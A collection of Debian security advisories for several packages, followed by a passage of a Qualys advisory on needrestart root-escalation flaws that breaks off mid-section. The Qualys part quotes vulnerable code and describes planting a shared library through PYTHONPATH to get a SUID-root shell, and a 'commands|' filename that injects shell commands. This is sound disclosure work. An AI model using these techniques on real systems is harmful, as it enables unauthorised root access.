Debian Linux Security Advisory 5823-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Clement Lecigne and Benoit Sevens discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems. Clement Lecigne and Benoit Sevens discovered that processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5823-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
December 02, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-44308 CVE-2024-44309

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-44308

    Clement Lecigne and Benoit Sevens discovered that processing  
    maliciously crafted web content may lead to arbitrary code  
    execution. Apple is aware of a report that this issue may have  
    been actively exploited on Intel-based Mac systems.

CVE-2024-44309

    Clement Lecigne and Benoit Sevens discovered that processing  
    maliciously crafted web content may lead to a cross site scripting  
    attack. Apple is aware of a report that this issue may have been  
    actively exploited on Intel-based Mac systems.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.46.4-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmdOKWgACgkQAAyEYu0C  
2AKrzQ/+MLk4EQ2c7zkYM1BU8PzgI1oNGvvl6VTcM696OWCvnj+hzyFLFsrwtwoc  
GeZ+Enz6VKBvtsXxTDgXLXw9NbFfFiVX2LnlIOzPcqfBXg9RTs70WwSM4CGUHTBs  
nPK1yixyYjCOy4MrlaCKrHttlrxqvK7VJeY0RypTfAkJlhzmHHdSpCfYAlJXtpFb  
dbGtP7pSxBnguTWq+oJFTG2wjyXjLcfd81QgcpOgINtnyn4hQaVVJOHr/H9+xoV5  
Rz6iGRS+MpmXyqc2kw2alEfY8UxfaP8K9X2u0A/YV8t+N6GKBLUNOo+XlFIFFb/J  
vbPbXRqaKCQzW0sIZ5um4Q9aBLX3JUiZIuz6+4lb5NTBbhnpjkG+EBGaoqG3OodY  
bZ9qmFZpXUYE/vSUzAcRWNsD6jWFV89Exu1BivAZdJ7J7tYzvs/2szHsATMkNjZo  
Twb6LH7PBd90hU6PETbuknrBgYd5dbdXXKn+v3SH9HXLMLd5S+xobEOMtGjG2zsd  
Z46JPP1FNqPDY+rHhWCDyVcvRnXx0WhY7PrGV/rjJ89M9xVYVZc136Bx8xrrULmo  
ZiAFBnz5VZRdeF/ma/inzsb8vXDCPX+0ruxtHdISiJf3Shjqft2mdfcR5mwPazab  
9GD3rCMl42A0Tftjg7b4f5J1x3ufy+kvfs+fEQ0jXYIuvoh7kF4=  
=v253  
-----END PGP SIGNATURE-----

Debian Security Advisory 5823-1

Debian Linux Security Advisory 5815-2 - The update for needrestart announced as DSA 5815-1 introduced a regression reporting false positives for processes running in chroot or mountns. Updated packages are now available to correct this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5815-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 02, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : needrestart  
Debian Bug     : 1087917 1087918 1087957 1087958 1088012 1088047

The update for needrestart announced as DSA 5815-1 introduced a  
regression reporting false positives for processes running in chroot or  
mountns. Updated packages are now available to correct this issue.

For the stable distribution (bookworm), this problem has been fixed in  
version 3.6-4+deb12u3.

We recommend that you upgrade your needrestart packages.

For the detailed security status of needrestart please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/needrestart

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmdOLfZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Sn3g//WQsjNzCoGkx1iIZBPHr+pwZgH8n+eY0dNawuXsY2C1qev5h1d7Z+sHaR  
4HL6cMdWV02gryQ67G9rWgd63qY8btOrGqPfUSr3gWeqdbz9tQMrn+/9k2y9i+v3  
TIMrQ6dJUrK2fGXy0tQSOKUg18x3PMnMfedgzhT1fMagTMVl9b3FZLzZliSwajW9  
za5XnlbyRxulxBPRRoxVmnIeTUVr4oy3hOXI7X7ShrI7o/F5m5MBobBcgzFrl4Jq  
4NoqeXVpZ3LrZApGvKCylLFuuiMdmVcp9p1bA627HuKwyBRSM8hr0BECdSOKWddi  
jpAmX17qgrBcLhtLul4re2OA5x6sazwg15FH2d7wY8ROLWJnWIY9NoMTQPqWpxts  
C5KvRfzexYThKXo93hY9xg1bq6DAGiAAmndCoxsjAAEijYHQgWGdaDOvaO4zJ+qj  
jS13+/ox1oNbKV+5hTq/Tk+hROGttSKqx1McVz9lgTmprUaNlzti5pL2qCGQ91sA  
RhQ5m6OVEv+4DuuUQ7YFWFEZMVZtBCNI9fx8jlhrOCNAI10lAfrKAI7WYjHzrt+C  
/v5ufT8ESVdn2Qb2+z4zThj1S7BWi0KinRJS/dyR0UXIepCXlRWCOTvH+9CU+6d3  
j23hDNbSy0DZvPbClwH7jF4j0SksUXP/DbXLHQmabmDo/1PbbRo=  
=ZY8f  
-----END PGP SIGNATURE-----

Debian Security Advisory 5815-2

Debian Linux Security Advisory 5822-1 - It was discovered that in SimpleSAMLphp, an implementation of the SAML 2.0 protocol, is prone to a XXE vulnerability when loading an (untrusted) XML document.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5822-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 02, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : simplesamlphpCVE ID         : CVE-2024-52596It was discovered that in SimpleSAMLphp, an implementation of the SAML2.0 protocol, is prone to a XXE vulnerability when loading an(untrusted) XML document.For the stable distribution (bookworm), this problem has been fixed inversion 1.19.7-1+deb12u1.We recommend that you upgrade your simplesamlphp packages.For the detailed security status of simplesamlphp please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/simplesamlphpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmdNx7dfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Ramw//R//UPGNKlLuKl+WKnQgmgGaI41VEE+Ny4juiPNpHDfB1xlQLO/QyrALMtolILT6yeCgYP7nYUj5iEWaEP04iAa8xZyt1dQyCBmHPWrRhGPD0fB2Ne1dC6xujjHWFyQ/j26It23Vuogp8I/Kh1EdMYfDP4heSaPQlL6hMrj+tMMCfIZfmrVgFAVSFVNtWFbmkidySw8rGtNKr5rv8DCPyxGZWGIFNsog4IbQ/9F01eovIdAbVMANKmj0Anw9BjH9eXK38CPvhUmewT/l7WPcMyhav9yQtE/OxMilIiCTT3BOlO+kdUmdfk0jr6+Q57mmdQR7CYM4eAjXeDg7akyquhT+L/x0zNZl25bA/E2XMkQwxBnzV5KU3Z8WjBXXirbkIjHkwPAKrZCOv75ryYL2WKj5yT6KaLAx7KMqq5OQPFAOAD/3/0llsT9vQyTBk0f5MaTjZ4mIRIcsSD5Vu4QgaaZXH1FLlKK6ykcZ2QHGNdGYkRmfP2YdTcK5s8rReoIUSaclhlz3rKS+lv5WrbOQbcOvtpq+squIFqD0rRGA9r4dN/g0mGu6Uh/fY7xmkE9Ell5Lkg2LUwsOpsx/AvO1QOPJhxUcqYtko8sC8waC3TAlYOeBycWQk5aFeDPpgzs7JoZLfZB2hIsjD4QLe/Kavp06JCwIcHDzlnwJ7RaZ/cYE==5GGL-----END PGP SIGNATURE-----

Debian Security Advisory 5822-1

Debian Linux Security Advisory 5821-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5821-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 27, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695  
                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:128.5.0esr-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcv8ACgkQEMKTtsN8  
TjY7kQ/9HOqGp2HwtLMf7jRWdCtBtwsAVOvOiYsGNr18FJRzTEj8CTXsz2ucn4Bg  
9c79NfbbMKQghXNKApzbDJb5Q2AEl9feic1EdMvKKqkTQQmWTKkxaTyqIVZ6/j/E  
pc2FmyKJKwHpPDseEDbG5UAv+Ea5HEvKuVp2G7KmkmxHVyh8iaanaQlk6GNgdzYd  
mUoHdlLre+MXp39ZzMyIGRs2NFUEP4gme7EglldGq77JXRGwWB3IDpYk0SViYKu0  
znO2+ITE39crVBTIGapaf2QD3Dppvbz0hsULrrPwmkDqlK4OqFJyaRuxGyv/Mymv  
YRQcBHpV9BQO9Xcl/RrD7qDgLyEHgjpX+c4tBau4h1+7RejDUTNyO7zArOrBAwYS  
pqd97quGWe9sSZyOJj1pF/yQRct9WExbMAhqGbNt5zdET7BSb09GtiKywT/vQKBl  
VEIO0LsAPYx1G+2nzhwdqzIQu6ojk52R0w/jmeBknsSsFp9mbfI5KKwBtNXWSpT+  
3z3NkWfr/5kzbPERj2jkS5MV/RzAe4d7zgxpEUMySIzUujszWI9RXo77heGYQ9LW  
3QfRqRmTUCwBaEdhf7YIqiYtyG7B6OYIOJPasDxvErRoEXwJKXic/oPxYmyCS2gx  
dYsoZntZJOvtjFzfzVBS3nJTv7+4PBWmqZSE9sCsDfazbJzn/fw=  
=RVGl  
-----END PGP SIGNATURE-----

Debian Security Advisory 5821-1

Debian Linux Security Advisory 5820-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, spoofing or cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5820-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, spoofing or cross-site scripting. For the stable distribution (bookworm), these problems have been fixed inversion 128.5.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcXoACgkQEMKTtsN8TjbVxg/+NpPN+XZlnNqjVxWv48TJO30h6qh+Zf7SZ3ToyxKH/nvMEOKNsgbutlednaKDlfJbVa761JBSCVR/CyERS32hC+IGDdn9i5w0BS2IrMsPOnF/eU6OExgUr7rMMkPuKUp9+YGJJwfEDgqHWSGj0jr2S2HcyMAtx2vcINSIhzbIcO7xhxj6P4CGAA8/0l2eOq3YpclgYB23gP69arKDPj++AIv5lLpmg1bHr+aeXde9Am/roaEdvA6tK5PM4ay86TsSsMKjB9bQLjcpH8sHYoCt8VRA4qkCED2KAwQBxQ115imOoeRyJbRjWHpbIt9DEBxxsbYlQTldDhghV4YcsrIhEFaVY5zlDHYegEicxrCVoQJV0cHbpedeCp2otNEuM+crLl1l/CuSEeBkX2F1Ng1CM2/dGJpfuYN63mhO7Zs+UIuecqyLy7ZMe7Ucno2sNJnLPIwcx+zpQwLj/jUDzK89jzW4ZR6BQ5VOI2ex+blMsrYFKWuMoZhXpnlt7qC1/SzlseedwbyAeSXLBcLhMckXfshNsO/B6JmgluOb5i2BBLFlUOpSFwZdDoknaKxjXLF+EUhrV08R63pxKp5HZvsBiirQk1kfbhyReaaWjBn1nIOr5x0IASEGk+s4T80/s+5lJpGkqnzjwTK8bM58i7sN5qJIrJD2gAgtsXxyOYj02S4==Cop0-----END PGP SIGNATURE-----

Debian Security Advisory 5820-1

Debian Linux Security Advisory 5819-1 - Multiple security issues were found in PHP, a widely-used open source general purpose scripting language which could result in denial of service, CLRF injection or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5819-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 26, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : CVE-2024-8929 CVE-2024-8932 CVE-2024-11233 CVE-2024-11234                  CVE-2024-11236Multiple security issues were found in PHP, a widely-used open sourcegeneral purpose scripting language which could result in denial ofservice, CLRF injection or information disclosure.For the stable distribution (bookworm), these problems have been fixed inversion 8.2.26-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdGKiQACgkQEMKTtsN8TjYO/xAAsbjq3KSRqKJYm9xZgKovwv+yyIvWC0d6FqSx9hhvuwthdyp9OGCJvUnSeM1eN9akh1akVMe/HQZ4VLiwVkRArHXsAGPcsIaqLKgmlC2Hi3nYgwES5sgBAW+rsDAuUA+pwIr43adM6b7ZQgogM0VJ0FChyZPB0F9vbjZ1fSTlPrLKTmSjIcovxxB2OiZbAit+PBe4hEtDJTdMaNrgHZwNZijXUH1r5Pa/SgchhQSdiUbrMKXzwS1n5eHRxQZOadVzyK2SoutyLWhXFBhFUInyh+A/wLcTItS7/0k1+Bbjzta4SNdP3DQrPnzeBIRsN48y3NmYNm8xCCPC2QyIawC2O7lUBw/Aah2poGH4CK5+vHdmpuMQb+H5M62od2flWY7PzXCBvcBbdqoIiFcu9VxyPoNEkDXnrQaHSdBGamvJ8pSUuH5AZHzxxgBXnRwYkK1RRcOkyceKgcQRZIq6jCW280p6RffFylaHp9j2cJ4cEcASPaaMuJGySc2Jf7XEFsNtxrSfUcKkzI550YcdPWPJy+EK9cpgKte4sGOXAVwE6YcTfLcbw6QGcdzBJ2of2M9qngUiDcvBB6CPw+QmYyz0eXfB8e0Tgv3KMKZTA6XNp+/CIu9Jn7QmUlaZiyjaQq1bezFioPhCPPbDggiGcNGSJrTFwIvYGCLySKXYWmIVVs4==L3u9-----END PGP SIGNATURE-----

Debian Security Advisory 5819-1

Debian Linux Security Advisory 5818-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5818-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
November 24, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-45888 CVE-2023-52812 CVE-2024-26952 CVE-2024-26954  
                 CVE-2024-35964 CVE-2024-36244 CVE-2024-36478 CVE-2024-36914  
                 CVE-2024-36915 CVE-2024-36923 CVE-2024-38540 CVE-2024-38553  
                 CVE-2024-41080 CVE-2024-42322 CVE-2024-43868 CVE-2024-43904  
                 CVE-2024-43911 CVE-2024-44949 CVE-2024-49950 CVE-2024-49960  
                 CVE-2024-49974 CVE-2024-49986 CVE-2024-49991 CVE-2024-50012  
                 CVE-2024-50036 CVE-2024-50067 CVE-2024-50072 CVE-2024-50126  
                 CVE-2024-50215 CVE-2024-50218 CVE-2024-50228 CVE-2024-50229  
                 CVE-2024-50230 CVE-2024-50232 CVE-2024-50233 CVE-2024-50234  
                 CVE-2024-50235 CVE-2024-50236 CVE-2024-50237 CVE-2024-50242  
                 CVE-2024-50243 CVE-2024-50244 CVE-2024-50245 CVE-2024-50247  
                 CVE-2024-50249 CVE-2024-50250 CVE-2024-50251 CVE-2024-50252  
                 CVE-2024-50255 CVE-2024-50256 CVE-2024-50257 CVE-2024-50259  
                 CVE-2024-50261 CVE-2024-50262 CVE-2024-50264 CVE-2024-50265  
                 CVE-2024-50267 CVE-2024-50268 CVE-2024-50269 CVE-2024-50271  
                 CVE-2024-50272 CVE-2024-50273 CVE-2024-50276 CVE-2024-50278  
                 CVE-2024-50279 CVE-2024-50280 CVE-2024-50282 CVE-2024-50283  
                 CVE-2024-50284 CVE-2024-50286 CVE-2024-50287 CVE-2024-50290  
                 CVE-2024-50292 CVE-2024-50295 CVE-2024-50296 CVE-2024-50299  
                 CVE-2024-50301 CVE-2024-50302 CVE-2024-53042 CVE-2024-53043  
                 CVE-2024-53052 CVE-2024-53054 CVE-2024-53055 CVE-2024-53057  
                 CVE-2024-53058 CVE-2024-53059 CVE-2024-53060 CVE-2024-53061  
                 CVE-2024-53063 CVE-2024-53066 CVE-2024-53070 CVE-2024-53072  
                 CVE-2024-53081 CVE-2024-53082 CVE-2024-53088 CVE-2024-53093

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.119-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmdDS8lfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0QwLw/+OVgV3FTBaH3iV5PLBx/mLJH6xhNQeHzzlQXnREHfueWblf9QSCjRGHkl  
3ZlIvTKIEp7K5mNjqLBzbDjRNWijJdcDPqEp8dVET9Xwvht6AOX3C/oZpIPlLKkf  
ei0vJSUVIselsK5WfndPi19gR/Y0asKUF+XK47nchELEkZX9r+Mv36yib4z2z4b8  
K0iUtpInS5krLrqHTJbo8tJZ69C7a+U12KYGhzbDFSGM39mDhKWQ/gmloxjXHu8K  
sS84Z4SwWMll1pcjfiFVeD669zUS/VHR8Y34s2pjPwqqIejDORUZbFc6FQhP+Vk6  
PJVAAPWv0n39Ag1gQ21/BQis+b2CcC9CHWuMaG6ELQ/8HmcTCQkCOwzCCPN2woMy  
mLLK2gR6hEU+zuBs4Pg7jvdAeznbCmG28WfR9FO+WO410rWc7+IL5vcbGDGUVNu2  
vIq+R6GKqUC+6maOxc78NKFuU0c09hvK6UHiTuFlFScSI1vhg8mIxSbwWEpVlDA/  
dRXWkGneZ+2/gqUBGK31X295irixsNjvjjipMB4K28WSqeaQdJh2IMgIViL05/TL  
4jJELIIpcizck336YsfY9Ylfc0lqdqumbzZnM3ifm3nGeOc6zK5bZmn5YLxju/qk  
xmj6u8WD5je+Dm8OCWWF22SPNSJ3xoaqchKKQSYwow3G1nqEqKI=  
=lqjj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5818-1

Debian Linux Security Advisory 5817-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5817-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 23, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-11110 CVE-2024-11111 CVE-2024-11112 CVE-2024-11113                  CVE-2024-11114 CVE-2024-11115 CVE-2024-11116 CVE-2024-11117                  CVE-2024-11395Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 131.0.6778.85-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmdBrIQACgkQZF0CR8NudjdsBw/+J+eOgiIrU4hNq1Fk3HAontTf7sOIp3snoI5FvNnZ9oZT8qFbRJ+cfj17S2ZijYGoZKaqydWQgO/kh6eL/k7mHpM0KYLlALxaGevLxh3M4eJx8Il83YKVtx23Eh6G6YZ8itXZXb+E0f7jNRRAWb6S6OCwImk6incDq4k48IdB3zKKOzCTZQBb7vr1OaP+4kbjGgzGy9vv+iYNgE4sBHa3MOmIqZ4zcDxazK7ypw6W0M7UW6raeFI+pjK3nh4rjgy/UpK0u+wpRprif53rC7D5qP9vRO7wnRajw2pUoovFl+1bnpi8njwK3JbZom5ARWozEtT2nfef1nmtyXUQ5bjcKlQTW5kxrqMNwXyzCxB3N7ln1l09ubaA7TdYj0TxNQiNimeGnTULrkMTKcs1d077dZZ6XTZAUrwVZiJn8V4QxaCW3Ype7hgPsd/edRJMZT5G+J2vB86WBmKt0FyKD2fmRUuq2DGqCnbd3+5A/3krQBcwgHXAHyxkJpLWNs1bdcRlOac6BKe1N7oZeJKtofhfwRrmhilDCM85Q4OcxOY2VeSuxMEPtw6hAUoYwiuhUS4hT2DUmevPu/XtkoNE/X0WoJ9cN+hlOxqfjzhXlcyJiGk36BYKhE+KJvUsOfB5N8TqUEzGGbvOyXDy7QGsCUZJ+BwjOGKFh45L0Nb4dexvsL4==J21V-----END PGP SIGNATURE-----

Debian Security Advisory 5817-1

Qualys discovered that needrestart suffers from multiple local privilege escalation vulnerabilities that allow for root access from an unprivileged user.

  
Qualys Security Advisory

LPEs in needrestart (CVE-2024-48990, CVE-2024-48991, CVE-2024-48992,  
CVE-2024-10224, and CVE-2024-11003)

========================================================================  
Contents  
========================================================================

Summary  
Background  
CVE-2024-48990 (and CVE-2024-48992)  
CVE-2024-48991  
CVE-2024-10224 (and CVE-2024-11003)  
Mitigation  
Acknowledgments  
Timeline

    I got bugs  
    I got bugs in my room  
    Bugs in my bed  
    Bugs in my ears  
    Their eggs in my head  
        -- Pearl Jam, "Bugs"

========================================================================  
Summary  
========================================================================

needrestart (from https://github.com/liske/needrestart) is a Perl tool  
that is installed by default on Ubuntu Server since version 21.04. From  
https://discourse.ubuntu.com/t/needrestart-changes-in-ubuntu-24-04-service-restarts:

------------------------------------------------------------------------  
  What is needrestart, exactly?

  needrestart is a tool that probes your system to see if either the  
  system itself or some of its services should be restarted. That last  
  part is the one of interest in this document. Notably, a service is  
  considered as needing to be restarted if one of its processes is using  
  a shared library whose initial file isn't on the system anymore (for  
  instance, if it has been overwritten by a new version as part of a  
  package update).

  We ship this tool in our server images, and it is configured by  
  default to run at the end of APT transactions, e.g. when doing apt  
  install/upgrade/remove or during unattended-upgrades.  
------------------------------------------------------------------------

We discovered three fundamental vulnerabilities in needrestart (three  
LPEs, Local Privilege Escalations, from any unprivileged user to full  
root), which are exploitable without user interaction on Ubuntu Server  
(through unattended-upgrades):

- CVE-2024-48990: local attackers can execute arbitrary code as root by  
  tricking needrestart into running the Python interpreter with an  
  attacker-controlled PYTHONPATH environment variable.

  Last-minute update: an additional CVE, CVE-2024-48992, has been  
  assigned to needrestart because local attackers can also execute  
  arbitrary code as root by tricking needrestart into running the Ruby  
  interpreter with an attacker-controlled RUBYLIB environment variable.

- CVE-2024-48991: local attackers can execute arbitrary code as root by  
  winning a race condition and tricking needrestart into running their  
  own, fake Python interpreter (instead of the system's real Python  
  interpreter).

- CVE-2024-10224: local attackers can execute arbitrary shell commands  
  as root by tricking needrestart into open()ing a filename of the form  
  "commands|" (technically, this vulnerability is in Perl's ScanDeps  
  module, but it is unclear whether this module was ever meant to  
  operate on attacker-controlled files or not).

  Last-minute update: in the end, an additional CVE, CVE-2024-11003, has  
  been assigned to needrestart for calling Perl's ScanDeps module with  
  attacker-controlled files.

To the best of our knowledge, these vulnerabilities have existed since  
the introduction of interpreter support in needrestart 0.8 (April 2014).  
>From https://github.com/liske/needrestart#interpreters:

------------------------------------------------------------------------  
  needrestart 0.8 brings an interpreter scanning feature. Interpreters  
  not only map binary (shared) objects but also use plaintext source  
  files. The interpreter detection tries to check for outdated source  
  files since they may contain security issues, too. This is only a  
  heuristic and might fail to detect all relevant source files. The  
  following interpreter scanners are shipped:

  - NeedRestart::Interp::Java  
  - NeedRestart::Interp::Perl  
  - NeedRestart::Interp::Python  
  - NeedRestart::Interp::Ruby  
------------------------------------------------------------------------

We will not publish our exploits for now; however, please note that  
these vulnerabilities are trivially exploitable, and other researchers  
might publish working exploits shortly after this coordinated release.

========================================================================  
Background  
========================================================================

    And now the questions:  
    Do I kill them?  
    Become their friend?  
    Do I eat them?  
        -- Pearl Jam, "Bugs"

While idly watching an "apt-get upgrade" of one of our Ubuntu Servers,  
we noticed a message that we had never noticed before: "Scanning  
processes..."

We immediately wondered: What is printing this message? Is it scanning  
userland processes? As root? Even processes that do not belong to root?

We quickly found out that this message is printed by needrestart, a tool  
that scans the userland for processes that need to be restarted after a  
package installation, upgrade, or removal. Naturally, needrestart scans  
all userland processes as root, including unprivileged user processes;  
i.e., possibly attacker-controlled processes.

========================================================================  
CVE-2024-48990 (and CVE-2024-48992)  
========================================================================

To determine whether a Python process (a process that is running the  
Python interpreter) needs to be restarted, needrestart extracts the  
PYTHONPATH environment variable from this process's /proc/pid/environ  
(at line 193), sets this environment variable if it exists (at line  
196), and executes Python ("$ptable->{exec}" at line 203) with a "-"  
argument to read a short, hard-coded script from stdin (at line 204):

------------------------------------------------------------------------  
135 sub files {  
136     my $self = shift;  
137     my $pid = shift;  
138     my $cache = shift;  
139     my $ptable = nr_ptable_pid($pid);  
...  
193     my %e = nr_parse_env($pid);  
194     local %ENV;  
195     if(exists($e{PYTHONPATH})) {  
196         $ENV{PYTHONPATH} = $e{PYTHONPATH};  
197     }  
...  
203     my ($pyread, $pywrite) = nr_fork_pipe2($self->{debug}, $ptable->{exec}, '-');  
204     print $pywrite "import sys\nprint(sys.path)\n";  
205     close($pywrite);  
------------------------------------------------------------------------

Unfortunately, if a Python process belongs to a local attacker, then  
needrestart executes Python (at line 203) with an attacker-controlled  
PYTHONPATH environment variable, which allows the attacker to execute  
arbitrary code as root (even though needrestart's hard-coded Python  
script at line 204 is not attacker-controlled at all). This is  
CVE-2024-48990.

For example, in our exploit we run a simple Python process (which  
sleep()s forever) with a "PYTHONPATH=/home/jane" environment variable,  
and plant a shared library "importlib/__init__.so" in our /home/jane.  
As soon as needrestart executes Python with our PYTHONPATH environment  
variable (at line 203), our shared library is executed (by Python's  
initialization code) and creates a SUID-root shell in /home/jane.

Note: needrestart's support code for the Ruby interpreter seems equally  
vulnerable, but we have not investigated this any further, because  
(unlike Python) Ruby is not installed by default on Ubuntu Server.

Last-minute update: we have now confirmed that needrestart's support  
code for the Ruby interpreter is indeed vulnerable and exploitable,  
through an attacker-controlled RUBYLIB environment variable and an  
"enc/encdb.so" shared library. This is CVE-2024-48992.

========================================================================  
CVE-2024-48991  
========================================================================

To determine whether a process is indeed a Python process (a process  
that is running the Python interpreter, for example /usr/bin/python3),  
needrestart reads this process's /proc/pid/exe (at line 520), and then  
matches it against the regular expression at line 45:

------------------------------------------------------------------------  
 520         my $exe = nr_readlink($pid);  
 ...  
 606             $restart++ if(needrestart_interp_check($nrconf{verbosity} > 1, $pid, $exe, $nrconf{blacklist_interp}, $opt_t));  
